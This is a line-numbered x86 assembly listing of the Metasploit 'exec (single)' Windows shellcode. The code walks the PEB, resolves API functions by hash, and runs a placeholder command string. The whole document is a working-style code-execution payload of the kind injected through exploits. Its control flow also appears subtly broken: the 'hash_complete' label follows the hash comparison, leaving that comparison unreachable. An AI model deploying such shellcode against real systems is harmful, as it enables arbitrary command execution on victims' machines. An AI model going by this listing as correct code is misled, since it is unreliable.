1
;
2
; Metasploit Framework
3
; http://www.metasploit.com
4
;
5
; Source for exec (single)
6
;
7
; Authors: vlad902 <vlad902@gmail.com>
8
; Size   : 113
9
;
10

11
cld
12
call startup
13
mov eax,[ebp+0x3c]
14
mov edi,[ebp+eax+0x78]
15
add edi,ebp
16
mov ecx,[edi+0x18]
17
mov ebx,[edi+0x20]
18
add ebx,ebp
19
next_export:
20
dec ecx
21
mov esi,[ebx+ecx*4]
22
add esi,ebp
23
xor eax,eax
24
cdq
25
next_byte:
26
lodsb
27
test al,al
28
jz hash_complete
29
ror edx,0xd
30
add edx,eax
31
jmp short next_byte
32
cmp edx,[esp+0x4]
33
jnz next_export
34
hash_complete:
35
mov ebx,[edi+0x24]
36
add ebx,ebp
37
mov cx,[ebx+ecx*2]
38
mov ebx,[edi+0x1c]
39
add ebx,ebp
40
mov ebx,[ebx+ecx*4]
41
add ebx,ebp
42
mov [esp+0x4],ebx
43
ret
44
startup:
45
pop edi
46
xor esi,esi
47
pusha
48
push esi
49
mov eax,[fs:esi+0x30]
50
mov eax,[eax+0xc]
51
mov esi,[eax+0x1c]
52
lodsd
53
mov ebp,[eax+0x8]
54
mov eax,edi
55
add eax,byte +0x6a
56
push eax
57
push dword 0x5f048af0
58
push dword 0xe8afe98
59
push edi
60
jmp edi
61
db "command string"
62

63